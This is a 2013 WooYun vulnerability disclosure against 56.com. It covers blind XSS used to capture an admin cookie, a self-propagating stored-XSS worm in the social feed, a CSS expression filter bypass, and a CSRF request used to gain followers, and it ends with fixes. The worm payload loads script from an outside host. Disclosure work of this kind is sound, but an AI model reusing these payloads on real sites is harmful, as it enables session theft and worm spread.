当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-023929

漏洞标题:咻,来个56.com的漏洞大礼包

相关厂商:56.com

漏洞作者: px1624

提交时间:2013-05-17 09:28

修复时间:2013-07-01 09:28

公开时间:2013-07-01 09:28

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-05-17: 细节已通知厂商并且等待厂商处理中
2013-05-17: 厂商已经确认,细节仅向厂商公开
2013-05-27: 细节向核心白帽子及相关领域专家公开
2013-06-06: 细节向普通白帽子公开
2013-06-16: 细节向实习白帽子公开
2013-07-01: 细节向公众公开

简要描述:

来个56.com的漏洞大礼包(xss盲打、xss盗号、蠕虫、csrf刷粉丝)。
漏洞大礼包是有了,礼物大礼包有木有!~(*^__^*) 嘻嘻

详细说明:

漏洞一:56网视频小镇问卷调查xss盲打。
1 问卷调查地址:

http://huodong.56.com/2013/diaocha/index.php?id=25


问卷调查的内容中,存在有输入框的位置没有过滤xss,可以插xss盲打后台。

1.png


2 成功收到管理员的cookie。

2.png


3 由于下午4点收到的cookie,而我是晚上10点才看到,所以后台cookie已经失效了(也有可能是他那边退出登录了)。

3.png


4 但是前台还是可以登录额。

4.png


漏洞二:56我秀首页 发布新鲜事 储存xss,可以蠕虫。
1 56秀地址:

http://xiu.56.com/

发布新鲜事位置,的图片src属性没有过滤"和onxxx

5.jpg


2 发布一条带有图片的新鲜事,抓包如下(post数据):

http://xiu.56.com/index.php?action=SnsApi&do=Publish
text
img http://c.p313.56img.com/photo2video/upImg/d1/68/2/thumb_kjtest09_5194f16315b20269.jpg
t 0.9721063207834959
isdefault 1
newyear_topic 0
video


然后修改post数据包为下图,插入xss代码。

6.png


3 可以看到成功的种植了调用外部js的xss代码。

7.png


4 试试抓下cookie,ok完全无压力。

8.png


5 试试蠕虫利用。
外部js文件中代码为(网站有调用jq):

jQuery.post("http://xiu.56.com/index.php?action=SnsApi&do=Publish",{
"text":"",
"img":"http://c.p313.56img.com/photo2video/upImg/d1/68/2/thumb_kjtest09_5194f16315b20269.jpg\" onload=\"with(document)body.appendChild(createElement('script')).src='//px1624.sinaapp.com/t.js'",
"t":"0.9721063207834959",
"isdefault":1,
"newyear_topic":0,
"video":""
})


换个浏览器换自己帐号去测试(刚才一直都是用那个xss到的管理账户在试)。
成功发布了一条带有xss蠕虫的图片的新鲜事。

9.jpg


6 这个漏洞我在提交乌云之前私下告诉了56乌云管理人员,当时说好,先不修补,等我截图完了再修。
没想到有的图我都没截,他就给修补了。
将onxxx过滤成了on<x>xxx,同时过滤了一些其他的关键字,以及图片地址判断了后缀等。

14.png


目前新鲜事首页的xss已经被修补了,不过不得不说56安全人员的安全意识啊(估计是直接随便弄了个过滤xss的js文件调用了一下),修补后照片墙位置的xss蠕虫还在。
我在提交乌云之前,又一次好心的去告诉了下他,所以不知道这个位置的现在还存在没。
照片墙测试地址:

http://xiu.56.com/index.php?action=Sns&do=photoWall&uid=kjtest09


10.png


而且这种修补治标不治本,我随便试了试,又给绕过了,不好意思。
利用style的expression,虽然这里expression也被过滤为了ex<x>pression。
但是重要的是,这里没有过滤 \ ,反斜线, 而 css里,允许使用转义字符, \ + ascii16进制形式。这样一来,我们就可以构造利用语句啦。
将expression写成ex\70ression即可成功绕过。至于那个后缀的判断,直接post数据后面多加个 .jpg 就给绕过了额。。。

16.png


18.png


看了一下,网站源码中还有句这个,就是把所有的IE浏览器都当作是IE7来执行,所以这个expression的xss就通杀所有的IE浏览器了。

17.png


下面是IE10下的成功xss弹窗。

19.png


诶,这。。。这岂不是又可以继续蠕虫了。
漏洞不可怕,可怕的就是厂商错误的修补。然后漏洞被公开后,被恶意份子进行了二次利用。
漏洞三:56我秀加关注csrf刷粉丝。
1 位置就是任意位置点击加关注。

11.jpg


2 抓包发现加关注是个get请求,具体形式如下,很明显可以用来刷粉丝。

http://xiu.56.com/index.php?action=SnsApi&do=DoFollow&attr=follow&t=0.8027756286319345&follow_user_id=用户名


3 去发个带有csrf的图,然后用另外一个帐号去访问那个会显示图片的地址。

12.png


4 成功执行了csrf,关注成功。

13.png


不一会儿,一大波粉丝就来了额。。

15.png

漏洞证明:

看上面。

修复方案:

漏洞一:过滤掉调查问卷中输入框位置的xss代码><"'/\&#这些特殊字符。
漏洞二:这个要过滤的本质是"号
漏洞三:get请求变为post请求,加token,判断refer。
PS:修补漏洞,还是认真专业点好,不要随便调用一个,八百年前的过滤xss的js库来骗自己额。。。
最后,求,礼物大礼包,这个可以有额~

版权声明:转载请注明来源 px1624@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:4

确认时间:2013-05-17 10:53

厂商回复:

非常感谢,已安排修复中。

最新状态:

2013-05-17:对不起px1624, 因为我们的操作失误这个漏洞Rank错选成了4, 如果可以重来的话我愿意给20.. 我们私聊下吧...